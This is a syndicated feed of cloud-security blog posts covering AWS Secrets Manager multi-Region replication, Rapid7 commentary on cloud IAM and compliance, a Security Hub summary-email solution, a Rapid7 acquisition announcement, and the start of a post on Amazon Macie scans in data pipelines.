Now suppose that you have a secret created in the primary Region (us-east-1) that hasn’t been configured for replication. You can also configure replication for this existing secret by using the following procedure.

To enable multi-Region replication for existing secrets

  1. In the Secrets Manager console, choose the secret name. At the top of the screen, choose Replicate secret to other regions.
    Figure 6: Enable replication for existing secrets

    Figure 6: Enable replication for existing secrets

    This opens a pop-up screen where you can configure the replica Region and the encryption key for encrypting the secret in the replica Region.

  2. Choose the AWS Region and encryption key for the replica Region, and then choose Complete adding region(s).
    Figure 7: Configure replication for existing secrets

    Figure 7: Configure replication for existing secrets

    This starts the process of replicating the secret from the primary Region to the replica Region.

  3. Scroll down to the Replicate Secret section. You can see that the replication to the us-west-2 Region is in progress.
    Figure 8: Review progress for secret replication

    Figure 8: Review progress for secret replication

    After the replication is successful, you can look under Replication status to review the replication details that you’ve configured for your secret. You can also choose to replicate your secret to more Regions by choosing Add more regions.

    Figure 9: Successful secret replication to a replica Region

    Figure 9: Successful secret replication to a replica Region

Update the secret with the CNAME record

Next, you can update the host value in your secret to the CNAME record of the DB instance endpoint. This will make it possible for you to use the secret in the replica Region without making changes to the replica secret. In the event of a failover to the replica Region, you can simply update the CNAME record to the DB instance endpoint in the replica Region as a part of your failover script

To update the secret with the CNAME record

  1. Navigate to the Secrets Manager console, and choose the secret that you have set up for replication
  2. In the Secret value section, choose Retrieve secret value, and then choose Edit.
  3. Update the secret value for the host with the CNAME record, and then choose Save.

    Figure 10: Edit the secret value

    Figure 10: Edit the secret value

  4. After you choose Save, you’ll see a banner at the top of the screen with a message that indicates that the secret was successfully edited.Because the secret is set up for replication, you can also review the status of the synchronization of your secret to the replica Region after you updated the secret. To do so, scroll down to the Replicate Secret section and look under Region Replication Status.

     

    Figure 11: Successful secret replication for a modified secret

    Figure 11: Successful secret replication for a modified secret

Access replicated secrets from the replica Region

Now that you’ve configured the secret for replication in the primary Region, you can access the secret from the replica Region. Here I demonstrate how to access a replicated secret from a simple Lambda function that is deployed in the replica Region (us-west-2).

To access the secret from the replica Region

  1. From the AWS Management Console, navigate to the Secrets Manager console in the replica Region (Oregon) and view the secret that you configured for replication in the primary Region (N. Virginia).

    Figure 12: View secrets that are configured for replication in the replica Region

    Figure 12: View secrets that are configured for replication in the replica Region

  2. Choose the secret name and review the details that were replicated from the primary Region. A secret that is configured for replication will display a banner at the top of the screen stating the replication details.

    Figure 13: The replication status banner

    Figure 13: The replication status banner

  3. Under Secret Details, you can see the secret’s ARN. You can use the secret’s ARN to retrieve the secret value from the Lambda function or application that is deployed in your replica Region (Oregon). Make a note of the ARN.

    Figure 14: View secret details

    Figure 14: View secret details

During a disaster recovery scenario when the primary Region isn’t available, you can update the CNAME record to point to the DB instance endpoint in us-west-2 as part of your failover script. For this example, my application that is deployed in the replica Region is configured to use the replicated secret’s ARN.

Let’s suppose your sample Lambda function defines the secret name and the Region in the environment variables. The REGION_NAME environment variable contains the name of the replica Region; in this example, us-west-2. The SECRET_NAME environment variable is the ARN of your replicated secret in the replica Region, which you noted earlier.

Figure 15: Environment variables for the Lambda function

Figure 15: Environment variables for the Lambda function

In the replica Region, you can now refer to the secret’s ARN and Region in your Lambda function code to retrieve the secret value for connecting to the database. The following sample Lambda function code snippet uses the secret_name and region_name variables to retrieve the secret’s ARN and the replica Region values stored in the environment variables.

secret_name = os.environ['SECRET_NAME']
region_name = os.environ['REGION_NAME']

def openConnection():
    # Create a Secrets Manager client
    session = boto3.session.Session()
    client = session.client(
        service_name='secretsmanager',
        region_name=region_name
    )
    try:
        get_secret_value_response = 
client.get_secret_value(
            SecretId=secret_name
        )
    except ClientError as e:
        if e.response['Error']['Code'] == 
'DecryptionFailureException':

Alternately, you can simply use the Python 3 sample code for the replicated secret to retrieve the secret value from the Lambda function in the replica Region. You can review the provided sample codes by navigating to the secret details in the console, as shown in Figure 16.

Figure 16: Python 3 sample code for the replicated secret

Figure 16: Python 3 sample code for the replicated secret

Summary

When you plan for disaster recovery, you can configure replication of your secrets in Secrets Manager to provide redundancy for your secrets. This feature reduces the overhead of deploying and maintaining additional configuration for secret replication and retrieval across AWS Regions. In this post, I showed you how to create a secret and configure it for multi-Region replication. I also demonstrated how you can configure replication for existing secrets across multiple Regions.

I showed you how to use secrets from the replica Region and configure a sample Lambda function to retrieve a secret value. When replication is configured for secrets, you can use this technique to retrieve the secrets in the replica Region in a similar way as you would in the primary Region.

You can start using this feature through the AWS Secrets Manager console, AWS Command Line Interface (AWS CLI), AWS SDK, or AWS CloudFormation. To learn more about this feature, see the AWS Secrets Manager documentation. If you have feedback about this blog post, submit comments in the Comments section below. If you have questions about this blog post, start a new thread on the AWS Secrets Manager forum.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Fatima Ahmed

Fatima is a Security Global Practice Lead at AWS. She is passionate about cybersecurity and helping customers build secure solutions in the AWS Cloud. When she is not working, she enjoys time with her cat or solving cryptic puzzles.

IAM Never Gonna Give You Up, Never Gonna Breach Your Cloud

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/03/03/iam-never-gonna-give-you-up-never-gonna-breach-your-cloud/

IAM Never Gonna Give You Up, Never Gonna Breach Your Cloud

This blog is part of an ongoing series sharing key takeaways from Rapid7’s 2020 Cloud Security Executive Summit. Interested in participating in the next summit on Tuesday, March 9? Register here!

Identity and access management (IAM) credentials have solved myriad security issues, but the recent cloud-based IAM movement has left many scratching their heads as to why it can be so complex.

IAM on-premises vs. IAM off-premises

IAM on-premises, well, it’s become a whole lot simpler. In many organizations, it is LDAP-based, so most things are tied back into it, such as database credentials and system accounts. There are more known processes and ways to deal with those. However, when it comes to the cloud, organizations now have to deal with inheritance and different aspects that may not correlate back to the on-premises world. These new concepts, new constructs, and different ways to interact can be overwhelming.

Complexity can really become an issue with something like assume-role in AWS. Going to a least-privileged model can frustrate people, so they may just want access to everything on a given surface, promising to scale the permissions back later. The worry there is that you can end up with over-permissioned identities that never get fixed. With assume-role in particular, credentials are no longer stored inside a physical operating system, but rather in a metadata layer associated to a piece of infrastructure. This applies to a number of different services specifically within the cloud provider—everything from compute instances, to database instances, to storage assets, and more. These aspects can all be very complex to secure, but there’s no question it makes operations safer. Speaking of safe…

Going fast vs. going safe

This may be stating the obvious, but a general sentiment of feature developers is that they aren’t all that excited about security. Often, this is because their jobs may depend on speed—they’re told to go fast. A main value prop on the cloud is that teams buy into the sentiment of “I can be as agile as I need to be, I can be as quick as I need to be.” So there’s a sort of relief at that, but it’s very likely those teams are also told, “Make sure we don’t have incidents, data breaches, or data exposures.” A tension can grow from increased use of the cloud and operational offloading of IAM protocols. In this case, keeping things as simple as possible is a way to maintain efficient processes and keep them moving. What are some tools organizations can use to lessen friction between developer teams and security?  

Service-control policies and session-control policies

If there’s an umbrella structure sitting over your cloud accounts, or over apps like Google projects, policies can be pushed from a top level down with service-control policies. A session policy is generated either from the user side, from an application, or from an assume-role. Going even further, there’s also an identity policy associated with each individual in an active session. With all of this potential complexity, how would organizations go about simplifying, especially as they shift authentication to the cloud?

The above process does provide an abundance of granularity as well as freedom to explicitly allow or deny at many, many levels. The flipside of that, of course, is that there are many, many levels.  

  • Leverage all aspects: Some companies may restrict access to specific services or regions. Plus, they may not want to go and use just any old cloud service due to various IAM implications, based on the level of security in the organization. So it’s about tailoring a set or policies to specific goals.
  • Pre-canned policies: Leveraging automation, it might be faster to deploy these types of policies while also leaving room for a certain amount of autonomy. In this way, teams can tailor some resource-level access standards.  

Again, based on a company’s specific goals, these types of processes can help ease friction between teams looking to ship a project fast and those trying their best to keep them secure.

Seeing it and protecting it

At the end of the day, the feeling from much of the security world is that visibility has to be there for SecOps to be able to tell you that something is secure. They may not need to go inside and read the data, but if there is no visibility, they can’t comment on any aspect of configuration. An old idea around securing infrastructure is that everything in a private network is implicitly authorized to access everything else. So, once a security checkpoint is crossed, anything could be accessed.

Of course, this whole process is aiming to improve incident-response efficiency by reducing security controls at every step of the kill chain. This would mean not assuming identities and not trusting anybody, also known as zero trust. Therefore, if the information on your website is something that’s super-secret, it might make sense to put it behind a VPN just for that extra layer of security—even if you have HTTPS authentication authorization—against someone who might not be part of the team.

A zero-trust initiative opens the discussion of workload identity in the cloud. Teams could use Google-native services to ensure apps are talking to each other, authenticating properly (AWS), and that connections originate from the right machines.

Identity is everything

At the end of the day, it’s never about invasion of any sort of privacy. It’s all about securing as much as you can and authenticating connections to protect against threats. A combination of technical processes and open communication is key in mitigating the challenges of protecting against those threats in a cloud-based IAM solution.

Want to learn more? Register for the upcoming Cloud Security Executive Summit on March 9 to hear industry-leading experts discuss the critical issues affecting cloud security today.

How to Achieve and Maintain Continuous Cloud Compliance

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/03/01/how-to-achieve-and-maintain-continuous-cloud-compliance/

How to Achieve and Maintain Continuous Cloud Compliance

This blog is part of an ongoing series sharing key takeaways from Rapid7’s 2020 Cloud Security Executive Summit. Interested in participating in the next summit on Tuesday, March 9? Register here!

There are two things that make data a hot topic. First, keeping track of your organization’s sheer volume of data is extremely difficult. Second, the evolving nature of the threat and threat-vector landscape can make data management and protection astonishingly challenging. We should be focused on staying compliant in the present, but also paying attention to and evolving for what’s coming in the near future.

Why is it so hard to achieve continuous compliance in the cloud?

Getting it all right and continuously achieving compliance can be taxing on any security organization, and the cloud adds another layer of mobility to this. Pushing more operations into the cloud has so many “shiny” benefits that the possibility of losing direct visibility into your physical environment could be a drawback whose true impact isn’t known until the long term.

People can also be a big x-factor when it comes to cloud compliance. For years, your workforce has been trained in one area of compliance, and now you might have to take such measures as hiring new talent or retraining existing employees in proper cloud-compliance methodologies. So, it’s certainly worth it to regularly take a hard look at your existing policies, because the last thing anyone wants is for their compliance to be out-of-date and no longer addressing the right issues.

Taking these considerations into account, and given the ephemeral nature of the cloud in general, is continuous cloud compliance even achievable?

The answer is yes, but of course it depends on what you’re trying to get compliant with. You might actually meet all of the laws, rules, and regulations in your industry, but at the same time not mitigating all the risks. This means ensuring you have preventative controls in place, as well as continuous monitoring and scanning, so that you can identify threats faster and mitigate more overall risk.

Therefore, the answer will be different for each organization as goals are defined and you go about building a unique and continuous cloud-compliant solution. A more specific goal would come back to people and ensuring they work within the guardrails you set for them in your monitoring and preventative measures.

Changing the culture of blame

What happens when unencrypted data ends up in the cloud? Is the engineer to blame? The security team? Is your organization properly calibrated to share accountability with other teams, or does responsibility end with you? There is no question that continuous compliance takes constant teamwork that revolves around being solution-oriented and learning to not “point the finger.” It’s important that all players are comfortable asking for help and, in a worst-case scenario, don’t feel scared for their jobs.

Innovation comes from experimentation, and personnel should feel a certain amount of freedom to do that as well as identify when things go wrong and own it. Sourcing the right talent plays a big role in changing the culture of blame. On-premises skills are different from a cloud-based set. For instance, an engineer who is great at automation on-premises could be struggling in the cloud. It simply comes down to a new spectrum of vocabularies they have to learn. It’s key to source talent that’s eager to learn, so that the whole team can ultimately become successful in this new environment.

Constant tuning

It would be amazing if there were a big red easy button for automating compliance and just calling it done. As automation does become easier, it will still take vigilance to optimize processes as budgets are freed up and stakeholders decide where it should be spent. Consider having the conversation around spending money to be compliant at the beginning of the project or you might delay it for a long period of time, and then spend $100 million more to become compliant. Getting everyone on the same page early can save lots of red-tape cutting and, of course, money.

Want to learn more? Register for the upcoming Cloud Security Executive Summit on March 9 to hear industry-leading experts discuss the critical issues affecting cloud security today.

How to set up a recurring Security Hub summary email

Post Syndicated from Justin Criswell original https://aws.amazon.com/blogs/security/how-to-set-up-a-recurring-security-hub-summary-email/

AWS Security Hub provides a comprehensive view of your security posture in Amazon Web Services (AWS) and helps you check your environment against security standards and best practices. In this post, we’ll show you how to set up weekly email notifications using Security Hub to provide account owners with a summary of the existing security findings to prioritize, new findings, and links to the Security Hub console for more information.

When you enable Security Hub, it collects and consolidates findings from AWS security services that you’re using, such as intrusion detection findings from Amazon GuardDuty, vulnerability scans from Amazon Inspector, Amazon Simple Storage Service (Amazon S3) bucket policy findings from Amazon Macie, publicly accessible and cross-account resources from IAM Access Analyzer, and resources lacking AWS WAF coverage from AWS Firewall Manager. Security Hub also consolidates findings from integrated AWS Partner Network (APN) security solutions.

Cloud security processes can differ from traditional on-premises security in that security is often decentralized in the cloud. With traditional on-premises security operations, security alerts are typically routed to centralized security teams operating out of security operations centers (SOCs). With cloud security operations, it’s often the application builders or DevOps engineers who are best situated to triage, investigate, and remediate the security alerts. This integration of security into DevOps processes is referred to as DevSecOps, and as part of this approach, centralized security teams look for additional ways to proactively engage application account owners in improving the security posture of AWS accounts.

This solution uses Security Hub custom insights, AWS Lambda, and the Security Hub API. A custom insight is a collection of findings that are aggregated by a grouping attribute, such as severity or status. Insights help you identify common security issues that might require remediation action. Security Hub includes several managed insights, or you can create your own custom insights. Amazon SNS topic subscribers will receive an email, similar to the one shown in Figure 1, that summarizes the results of the Security Hub custom insights.

Figure 1: Example email with a summary of security findings for an account

Figure 1: Example email with a summary of security findings for an account

Solution overview

This solution assumes that Security Hub is enabled in your AWS account. If it isn’t enabled, set up the service so that you can start seeing a comprehensive view of security findings across your AWS accounts.

A recurring Security Hub summary email provides recipients with a proactive communication that summarizes the security posture and any recent improvements within their AWS accounts. The email message contains the following sections:

Here’s how the solution works:

  1. Seven Security Hub custom insights are created when you first deploy the solution.
  2. An Amazon CloudWatch time-based event invokes a Lambda function for processing.
  3. The Lambda function gets the results of the custom insights from Security Hub, formats the results for email, and sends a message to Amazon SNS.
  4. Amazon SNS sends the email notification to the address you provided during deployment.
  5. The email includes the summary and links to the Security Hub UI so that the recipient can follow the remediation workflow.

Figure 2 shows the solution workflow.

Figure 2: Solution overview, deployed through AWS CloudFormation

Figure 2: Solution overview, deployed through AWS CloudFormation

Security Hub custom insight

The finding results presented in the email are summarized by Security Hub custom insights. A Security Hub insight is a collection of related findings. Each insight is defined by a group by statement and optional filters. The group by statement indicates how to group the matching findings, and identifies the type of item that the insight applies to. For example, if an insight is grouped by resource identifier, then the insight produces a list of resource identifiers. The optional filters narrow down the matching findings for the insight. For example, you might want to see only the findings from specific providers or findings associated with specific types of resources. Figure 3 shows the seven custom insights that are created as part of deploying this solution.

Figure 3: Custom insights created by the solution

Figure 3: Custom insights created by the solution

Sample custom insight

Security Hub offers several built-in managed (default) insights. You can’t modify or delete managed insights. You can view the custom insights created as part of this solution in the Security Hub console under Insights, by selecting the Custom Insights filter. From the email, follow the link for “Summary Email – 02 – Failed AWS Foundational Security Best Practices” to see the summarized finding counts, as well as graphs with related data, as shown in Figure 4.

Figure 4: Detail view of the email titled “Summary Email – 02 – Failed AWS Foundational Security Best Practices”

Figure 4: Detail view of the email titled “Summary Email – 02 – Failed AWS Foundational Security Best Practices”

Let’s evaluate the filters that create this custom insight:

Filter setting Filter results
Type is “Software and Configuration Checks/Industry and Regulatory Standards/AWS-Foundational-Security-Best-Practices” Captures all current and future findings created by the security standard AWS Foundational Security Best Practices.
Status is FAILED Captures findings where the compliance status of the resource doesn’t pass the assessment.
Workflow Status is not SUPPRESSED Captures findings where Security Hub users haven’t updated the finding to the SUPPRESSED status.
Record State is ACTIVE Captures findings that represent the latest assessment of the resource. Security Hub automatically archives control-based findings if the associated resource is deleted, the resource does not exist, or the control is disabled.
Group by SeverityLabel Creates the insight and populates the counts.

Solution artifacts

The solution provided with this blog post consists of two files:

  1. An AWS CloudFormation template named security-hub-email-summary-cf-template.json.
  2. A zip file named sec-hub-email.zip for the Lambda function that generates the Security Hub summary email.

In addition to the Security Hub custom insights as discussed in the previous section, the solution also deploys the following artifacts:

  1. An Amazon Simple Notification Service (Amazon SNS) topic named SecurityHubRecurringSummary and an email subscription to the topic.
    Figure 5: SNS topic created by the solution

    Figure 5: SNS topic created by the solution

    The email address that subscribes to the topic is captured through a CloudFormation template input parameter. The subscriber is notified by email to confirm the subscription, and after confirmation, the subscription to the SNS topic is created.

    Figure 6: SNS email subscription

    Figure 6: SNS email subscription

  2. Two Lambda functions:
    1. A Lambda function named *-CustomInsightsFunction-* is used only by the CloudFormation template to create the custom Insights.
    2. A Lambda function named SendSecurityHubSummaryEmail queries the custom insights from the Security Hub API and uses the insights’ data to create the summary email message. The function then sends the email message to the SNS topic.

      Figure 7: Example of Lambda functions created by the solution

      Figure 7: Example of Lambda functions created by the solution

  3. Two IAM roles for the Lambda functions provide the following rights, respectively:
    1. The minimum rights required to create insights and to create CloudWatch log groups and logs.
      {
          "Version": "2012-10-17",
          "Statement": [
              {
                  "Action": [
                      "logs:CreateLogGroup",
                      "logs:CreateLogStream",
                      "logs:PutLogEvents"
                  ],
                  "Resource": "arn:aws:logs:*:*:*",
                  "Effect": "Allow"
              },
              {
                  "Action": [
                      "securityhub:CreateInsight"
                  ],
                  "Resource": "*",
                  "Effect": "Allow"
              }
          ]
      }
      

    2. The minimum rights required to query Security Hub insights and to send email messages to the SNS topic named SecurityHubRecurringSummary.
      {
          "Version": "2012-10-17",
          "Statement": [
              {
                  "Action": "sns:Publish",
                  "Resource": "arn:aws:sns:[REGION]:[ACCOUNT-ID]:SecurityHubRecurringSummary",
                  "Effect": "Allow"
              }
          ]
      } ,
      {
          "Version": "2012-10-17",
          "Statement": [
              {
                  "Effect": "Allow",
                  "Action": [
                      "securityhub:Get*",
                      "securityhub:List*",
                      "securityhub:Describe*"
                  ],
                  "Resource": "*"
              }
          ]
      }             
      

  4. A CloudWatch scheduled event named SecurityHubSummaryEmailSchedule for invoking the Lambda function that generates the summary email. The default schedule is every Monday at 8:00 AM GMT. This schedule can be overwritten by using a CloudFormation input parameter. Learn more about creating Cron expressions.

    Figure 8: Example of CloudWatch schedule created by the solution

    Figure 8: Example of CloudWatch schedule created by the solution

Deploy the solution

The following steps demonstrate the deployment of this solution in a single AWS account and Region. Repeat these steps in each of the AWS accounts that are active with Security Hub, so that the respective application owners can receive the relevant data from their accounts.

To deploy the solution

  1. Download the CloudFormation template security-hub-email-summary-cf-template.json and the .zip file sec-hub-email.zip from https://github.com/aws-samples/aws-security-hub-summary-email.
  2. Copy security-hub-email-summary-cf-template.json and sec-hub-email.zip to an S3 bucket within your target AWS account and Region. Copy the object URL for the CloudFormation template .json file.
  3. On the AWS Management Console, open the service CloudFormation. Choose Create Stack with new resources.

    Figure 9: Create stack with new resources

    Figure 9: Create stack with new resources

  4. Under Specify template, in the Amazon S3 URL textbox, enter the S3 object URL for the file security-hub-email-summary-cf-template.json that you uploaded in step 1.

    Figure 10: Specify S3 URL for CloudFormation template

    Figure 10: Specify S3 URL for CloudFormation template

  5. Choose Next. On the next page, under Stack name, enter a name for the stack.

    Figure 11: Enter stack name

    Figure 11: Enter stack name

  6. On the same page, enter values for the input parameters. These are the input parameters that are required for this CloudFormation template:
    1. S3 Bucket Name: The S3 bucket where the .zip file for the Lambda function (sec-hub-email.zip) is stored.
    2. S3 key name (with prefixes): The S3 key name (with prefixes) for the .zip file for the Lambda function.
    3. Email address: The email address of the subscriber to the Security Hub summary email.
    4. CloudWatch Cron Expression: The Cron expression for scheduling the Security Hub summary email. The default is every Monday 8:00 AM GMT. Learn more about creating Cron expressions.
    5. Additional Footer Text: Text that will appear at the bottom of the email message. This can be useful to guide the recipient on next steps or provide internal resource links. This is an optional parameter; leave it blank for no text.
    Figure 12: Enter CloudFormation parameters

    Figure 12: Enter CloudFormation parameters

  7. Choose Next.
  8. Keep all defaults in the screens that follow, and choose Next.
  9. Select the check box I acknowledge that AWS CloudFormation might create IAM resources, and then choose Create stack.

Test the solution

You can send a test email after the deployment is complete. To do this, navigate to the Lambda console and locate the Lambda function named SendSecurityHubSummaryEmail. Perform a manual invocation with any event payload to receive an email within a few minutes. You can repeat this procedure as many times as you wish.

Conclusion

We’ve outlined an approach for rapidly building a solution for sending a weekly summary of the security posture of your AWS account as evaluated by Security Hub. This solution makes it easier for you to be diligent in reviewing any outstanding findings and to remediate findings in a timely way based on their severity. You can extend the solution in many ways, including:

  1. Add links in the footer text to the remediation workflows, such as creating a ticket for ServiceNow or any Security Information and Event Management (SIEM) that you use.
  2. Add links to internal wikis for workflows like organizational exceptions to vulnerabilities or other internal processes.
  3. Extend the solution by modifying the custom insights content, email content, and delivery frequency.

To learn more about how to set up and customize Security Hub, see these additional blog posts.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the AWS Security Hub forum.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Justin Criswell

Justin is a Senior Security Specialist Solutions Architect at AWS. His background is in cloud security and customer success. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS Security Services to increase visibility and reduce risk.

Author

Kavita Mahajan

Kavita is a Senior Partner Solutions Architect at AWS. She has a background in building software systems for the financial sector, specifically insurance and banking. Currently, she is focused on helping AWS partners develop capabilities, grow their practices, and innovate on the AWS platform to deliver the best possible customer experience.

Why More Teams are Shifting Security Analytics to the Cloud This Year

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2021/02/17/why-more-teams-are-shifting-security-analytics-to-the-cloud-this-year/

Why More Teams are Shifting Security Analytics to the Cloud This Year

As the threat landscape continues to evolve in size and complexity, so does the security skills and resource gap, leaving organizations both understaffed and overwhelmed. An ESG study found that 63% of organizations say security is more difficult than it was two years ago. Teams cite the growing attack surface, increasing alerts, and bandwidth as key reasons.

For their research, ESG surveyed hundreds of IT and cybersecurity professionals to gain more insights into strategies for driving successful security analytics and operations. Read the highlights of their study below, and check out the full ebook, “The Rise of Cloud-Based Security Analytics and Operations Technologies,” here.

The attack surface continues to grow as cloud adoption soars

Many organizations have been adopting cloud solutions, giving teams more visibility across their environments, while at the same time expanding their attack surface. The trend toward the cloud is only continuing to increase—ESG’s research found that 82% of organizations are dedicated to moving a significant amount of their workload and applications to the public cloud. The surge in remote work over the past year has arguably only amplified this, making it even more critical for teams to have detection and response programs that are more effective and efficient than ever before.

Organizations are looking toward consolidation to streamline incident detection and response

ESG found that 70% of organizations are using a SIEM tool today as well as an assortment of other other point solutions, such as an EDR or Network Traffic Analysis solution. While this fixes the visibility issue plaguing security teams today, it doesn’t help with streamlining detection and response, which is likely why 36% of cybersecurity professionals say integrating disparate security analytics and operations tools is one of their organization’s highest priorities. Consolidating solutions drastically cuts down on false-positive alerts, eliminating the noise and confusion of managing multiple tools.

Combat complexity and drive efficiency with the right cloud solution

A detection and response solution that can correlate all of your valuable security data in one place is key for accelerated detection and response across the sprawling attack surface. Rapid7’s InsightIDR provides advanced visibility by automatically ingesting data from across your environment—including logs, endpoints, network traffic, cloud, and use activity—into a single solution, eliminating the need to jump in and out of multiple tools and giving hours back to your team. And with pre-built automation workflows, you can take action directly from within InsightIDR.

See ESG’s findings on cloud-based solutions, automation/orchestration, machine learning, and more by accessing “The Rise of Cloud-Based Security Analytics and Operations Technologies” ebook.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Rapid7 Acquires Leading Kubernetes Security Provider, Alcide

Post Syndicated from Brian Johnson original https://blog.rapid7.com/2021/02/01/rapid7-acquires-leading-kubernetes-security-provider-alcide/

Rapid7 Acquires Leading Kubernetes Security Provider, Alcide

Organizations around the globe continue to embrace the flexibility, speed, and agility of the cloud. Those that have adopted it are able to accelerate innovation and deliver real value to their customers faster than ever before. However, while the cloud can bring a tremendous amount of benefits to a company, it is not without its risks. Organizations need comprehensive visibility into their cloud and container environments to help mitigate risk, potential threats, and misconfigurations.

At Rapid7, we strive to help our customers establish and implement strategies that enable them to rapidly adopt and secure cloud environments. Looking only at cloud infrastructure or containers in a silo provides limited ability to understand the impact of a possible vulnerability or breach.

To help our customers gain a more comprehensive view of their cloud environments, I am happy to announce that we have acquired Alcide, a leader in Kubernetes security based in Tel Aviv, Israel. Alcide provides seamless Kubernetes security fully integrated into the DevOps lifecycle and processes so that business applications can be rapidly deployed while also protecting cloud environments from malicious attacks.

Alcide’s industry-leading cloud workload protection platform (CWPP) provides broad, real-time visibility and governance, container runtime and network monitoring, as well as the ability to detect, audit, and investigate known and unknown security threats. By bringing together Alcide’s CWPP capabilities with our existing posture management (CSPM) and infrastructure entitlements (CIEM) capabilities, we will be able to provide our customers with a cloud-native security platform that enables them to manage risk and compliance across their entire cloud environment.

This is an exciting time in cloud security, as we’re witnessing a shift in perception. Cloud security teams are no longer viewed as a cost center or operational roadblock and have earned their seat at the table as a critical investment essential to driving business forward. With Alcide, we’re excited to further increase that competitive advantage for our customers.

We look forward to joining forces with Alcide’s talented team as we work together to provide our customers comprehensive, unified visibility across their entire cloud infrastructure and cloud-native applications.

Welcome to the herd, Alcide!

Use Macie to discover sensitive data as part of automated data pipelines

Post Syndicated from Brandon Wu original https://aws.amazon.com/blogs/security/use-macie-to-discover-sensitive-data-as-part-of-automated-data-pipelines/

Data is a crucial part of every business and is used for strategic decision making at all levels of an organization. To extract value from their data more quickly, Amazon Web Services (AWS) customers are building automated data pipelines—from data ingestion to transformation and analytics. As part of this process, my customers often ask how to prevent sensitive data, such as personally identifiable information, from being ingested into data lakes when it’s not needed. They highlight that this challenge is compounded when ingesting unstructured data—such as files from process reporting, text files from chat transcripts, and emails. They also mention that identifying sensitive data inadvertently stored in structured data fields—such as in a comment field stored in a database—is also a challenge.

In this post, I show you how to integrate Amazon Macie as part of the data ingestion step in your data pipeline. This solution provides an additional checkpoint that sensitive data has been appropriately redacted or tokenized prior to ingestion. Macie is a fully managed data security and privacy service that uses machine learning and pattern matching to discover sensitive data in AWS.

When Macie discovers sensitive data, the solution notifies an administrator to review the data and decide whether to allow the data pipeline to continue ingesting the objects. If allowed, the objects will be tagged with an Amazon Simple Storage Service (Amazon S3) object tag to identify that sensitive data was found in the object before progressing to the next stage of the pipeline.

This combination of automation and manual review helps reduce the risk that sensitive data—such as personally identifiable information—will be ingested into a data lake. This solution can be extended to fit your use case and workflows. For example, you can define custom data identifiers as part of your scans, add additional validation steps, create Macie suppression rules to archive findings automatically, or only request manual approvals for findings that meet certain criteria (such as high severity findings).

Solution overview

Many of my customers are building serverless data lakes with Amazon S3 as the primary data store. Their data pipelines commonly use different S3 buckets at each stage of the pipeline. I refer to the S3 bucket for the first stage of ingestion as the raw data bucket. A typical pipeline might have separate buckets for raw, curated, and processed data representing different stages as part of their data analytics pipeline.

Typically, customers will perform validation and clean their data before moving it to a raw data zone. This solution adds validation steps to that pipeline after preliminary quality checks and data cleaning is performed, noted in blue (in layer 3) of Figure 1. The layers outlined in the pipeline are:

  1. Ingestion – Brings data into the data lake.
  2. Storage – Provides durable, scalable, and secure components to store the data—typically using S3 buckets.
  3. Processing – Transforms data into a consumable state through data validation, cleanup, normalization, transformation, and enrichment. This processing layer is where the additional validation steps are added to identify instances of sensitive data that haven’t been appropriately redacted or tokenized prior to consumption.
  4. Consumption – Provides tools to gain insights from the data in the data lake.

 

Figure 1: Data pipeline with sensitive data scan

Figure 1: Data pipeline with sensitive data scan

The application runs on a scheduled basis (four times a day, every 6 hours by default) to process data that is added to the raw data S3 bucket. You can customize the application to perform a sensitive data discovery scan during any stage of the pipeline. Because most customers do their extract, transform, and load (ETL) daily, the application scans for sensitive data on a scheduled basis before any crawler jobs run to catalog the data and after typical validation and data redaction or tokenization processes complete.

You can expect that this additional validation will add 5–10 minutes to your pipeline execution at a minimum. The validation processing time will scale linearly based on object size, but there is a start-up time per job that is constant.

If sensitive data is found in the objects, an email is sent to the designated administrator requesting an approval decision, which they indicate by selecting the link corresponding to their decision to approve or deny the next step. In most cases, the reviewer will choose to adjust the sensitive data cleanup processes to remove the sensitive data, deny the progression of the files, and re-ingest the files in the pipeline.

Additional considerations for deploying this application for regular use are discussed at the end of the blog post.

Application components

The following resources are created as part of the application:

Note: the application uses various AWS services, and there are costs associated with these resources after the Free Tier usage. See AWS Pricing for details. The primary drivers of the solution cost will be the amount of data ingested through the pipeline, both for Amazon S3 storage and data processed for sensitive data discovery with Macie.

The architecture of the application is shown in Figure 2 and described in the text that follows.
 

Figure 2: Application architecture and logic

Figure 2: Application architecture and logic

Application logic

  1. Objects are uploaded to the raw data S3 bucket as part of the data ingestion process.
  2. A scheduled EventBridge rule runs the sensitive data scan Step Functions workflow.
  3. triggerMacieScan Lambda function moves objects from the raw data S3 bucket to the scan stage S3 bucket.
  4. triggerMacieScan Lambda function creates a Macie sensitive data discovery job on the scan stage S3 bucket.
  5. checkMacieStatus Lambda function checks the status of the Macie sensitive data discovery job.
  6. isMacieStatusCompleteChoice Step Functions Choice state checks whether the Macie sensitive data discovery job is complete.
    1. If yes, the getMacieFindingsCount Lambda function runs.
    2. If no, the Step Functions Wait state waits 60 seconds and then restarts Step 5.
  7. getMacieFindingsCount Lambda function counts all of the findings from the Macie sensitive data discovery job.
  8. isSensitiveDataFound Step Functions Choice state checks whether sensitive data was found in the Macie sensitive data discovery job.
    1. If there was sensitive data discovered, run the triggerManualApproval Lambda function.
    2. If there was no sensitive data discovered, run the moveAllScanStageS3Files Lambda function.
  9. moveAllScanStageS3Files Lambda function moves all of the objects from the scan stage S3 bucket to the scanned data S3 bucket.
  10. triggerManualApproval Lambda function tags and moves objects with sensitive data discovered to the manual review S3 bucket, and moves objects with no sensitive data discovered to the scanned data S3 bucket. The function then sends a notification to the ApprovalRequestNotification Amazon SNS topic as a notification that manual review is required.
  11. Email is sent to the email address that’s subscribed to the ApprovalRequestNotification Amazon SNS topic (from the application deployment template) for the manual review user with the option to Approve or Deny pipeline ingestion for these objects.
  12. Manual review user assesses the objects with sensitive data in the manual review S3 bucket and selects the Approve or Deny links in the email.
  13. The decision request is sent from the Amazon API Gateway to the receiveApprovalDecision Lambda function.
  14. manualApprovalChoice Step Functions Choice state checks the decision from the manual review user.
    1. If denied, run the deleteManualReviewS3Files Lambda function.
    2. If approved, run the moveToScannedDataS3Files Lambda function.
  15. deleteManualReviewS3Files Lambda function deletes the objects from the manual review S3 bucket.
